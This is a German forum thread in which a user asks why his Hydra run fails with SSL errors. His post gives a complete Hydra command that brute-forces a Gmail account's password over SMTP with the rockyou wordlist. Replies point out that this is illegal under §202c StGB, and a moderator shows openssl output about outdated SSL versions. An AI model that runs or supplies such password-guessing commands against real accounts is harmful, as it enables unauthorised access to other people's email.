Danke Danke:  0
Dislikes Dislikes:  0
Ergebnis 1 bis 4 von 4

Thema: Benutzung von Hydra

  1. #1

    Registriert seit
    13.05.17
    Danke (erhalten)
    0
    Gefällt mir (erhalten)
    0

    Standard Benutzung von Hydra

    Anzeige
    Hi,
    Ich bin der Jürgen aus Berlin [snip]
    Im Kommandofenster von Windows 10 habe ich das Kommando hydra -l mailaccount@gmail.com -P \users\jschu\Downloads\rockyou\rockyou.txt -s 465 -S -v -V -t 1 smtp.gmail.com smtp ausgeführt.
    Es kommen bei jedem Passwortversuch die Meldungen:
    [ATTEMPT] target smtp.gmail.com - login "mailaccount@gmail.com" - pass "ciaran" - 5335 of 14344527 [child 0]
    [VERBOSE] Could not create an SSL session: error:14077102:SSL routines:SSL23_GET_SERVER_HELLO:unsupported protocol
    [ERROR] Child with pid 8608 terminating, can not connect


    Die Meldungen irretieren mich ein wenig weil immer die gleiche Error Meldung dabei ist und die pid ist immer unterschiedlich.
    Vielleicht gibt es ja hier jemanden der mir das erklären kann.
    Sollte mein Thema in der falschen Rubrik plaziert sein, so möchte ich das im voraus entschuldigen.

    Vielen Dank im voraus
    Geändert von CDW (14.05.17 um 13:20 Uhr) Grund: Ein paar Sätze herausgeschnitten, die nicht so wirklich zum Problemverständniss beitragen *hust*

  2. #2

    Registriert seit
    05.12.15
    Danke (erhalten)
    6
    Gefällt mir (erhalten)
    15

    Standard

    Hey,
    ich würde dir zunächst raten diese Frage umzuformulieren, da sie Straftat als Hintergrund hat, und keiner in diesem Board dazu helfen wird.
    Jedoch zu eigenen recherche Zwecken, wie leicht es ist, sein eigenes Mailkonto zu hacken, könnte hilfreichere Kommentare erbringen.

    Viele Grüße

  3. #3
    Member of Honour
    Registriert seit
    07.12.04
    Danke (erhalten)
    22
    Gefällt mir (erhalten)
    528

    Standard

    Da Hydra Sicherheitsvorkehrungen umgehen kann, muss es nach Inkrafttreten des sogenannten Hackerparagrafen (§202c StGB) in Deutschland als Computerprogramm zum Ausspähen von Daten aufgefasst werden. Somit kann die illegale Benutzung der Software unter Strafe gestellt werden. Für legale Zwecke, z.B. die Austestung des eigenen Sicherheitssystems, kann Hydra genutzt werden.
    Dies gilt auch für die eigene Mailadresse, sofern sie nicht auf dem eigenen Mailserver liegt.
    Ansonsten wird von den meisten Anbietern vor der Nutzung von SMTP eine Verbindung per POP3 oder eben eine bestehende IMAP-Verbindung verlangt.

    Gruß

    PS: Meinst du nicht, dass es ziemlich blöd ist Google anzugreifen mit einem Programm, welches du über Google gefunden hast?
    Also lass es lieber, die haben nicht nur die besseren Anwälte sondern auch mehr Ahnung.
    Man sollte sich angewöhnen die Dinge öfters von Aussen zu betrachten,
    denn von Innen sieht das Hamsterrad auch wie eine Karriereleiter aus.

  4. #4
    Moderator Avatar von CDW
    Registriert seit
    20.07.05
    Danke (erhalten)
    34
    Gefällt mir (erhalten)
    846

    Standard

    Anzeige
    Zitat Zitat von stephens Beitrag anzeigen
    [VERBOSE] Could not create an SSL session: error:14077102:SSL routines:SSL23_GET_SERVER_HELLO:unsupported protocol
    [ERROR] Child with pid 8608 terminating, can not connect[/B]

    Die Meldungen irretieren mich ein wenig weil immer die gleiche Error Meldung dabei ist und die pid ist immer unterschiedlich.
    Vielleicht gibt es ja hier jemanden der mir das erklären kann.
    SSL v3 (von v2 ganz zu schweigen) gilt schon seit ein paar Jahren als veraltet.

    Code:
    % openssl s_client -connect smtp.gmail.com:465 -tls1 
    ...
        Start Time: 1494758338
        Timeout   : 7200 (sec)
        Verify return code: 0 (ok)
    ---
    220 smtp.gmail.com ESMTP m201sm13395731wmd.15 - gsmtp
    
    %openssl s_client -connect smtp.gmail.com:465 -ssl2                       
    CONNECTED(00000005)
    34383111576:error:1407F0E5:SSL routines:ssl2_write:ssl handshake failure:s2_pkt.c:412:
    ---
    no peer certificate available
    ---
    No client certificate CA names sent
    Noch mal, für alle Pseudo-Geeks: 1+1=0. -> 10 wäre Überlauf!
    Selig, wer nichts zu sagen hat und trotzdem schweigt.

  5. Gefällt mir SchwarzeBeere, Chromatin liked this post

Ähnliche Themen

  1. hydra über Cygwin
    Von AbraKadaver im Forum Applikationen
    Antworten: 6
    Letzter Beitrag: 12.03.13, 16:09
  2. Hydra Funkt nicht
    Von Pakistani im Forum Applikationen
    Antworten: 3
    Letzter Beitrag: 21.03.09, 18:41
  3. Hydra Funkt nicht
    Von Pakistani im Forum Hacks & Crackmes
    Antworten: 2
    Letzter Beitrag: 21.03.09, 15:36
  4. Programm: Hydra
    Von SacRed im Forum Virenschutz · Tools & Aggressive Software
    Antworten: 8
    Letzter Beitrag: 09.07.07, 15:11
  5. Mit Hydra SSH bruteforcen
    Von buggybunny im Forum Virenschutz · Tools & Aggressive Software
    Antworten: 2
    Letzter Beitrag: 18.03.07, 23:19

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein
  •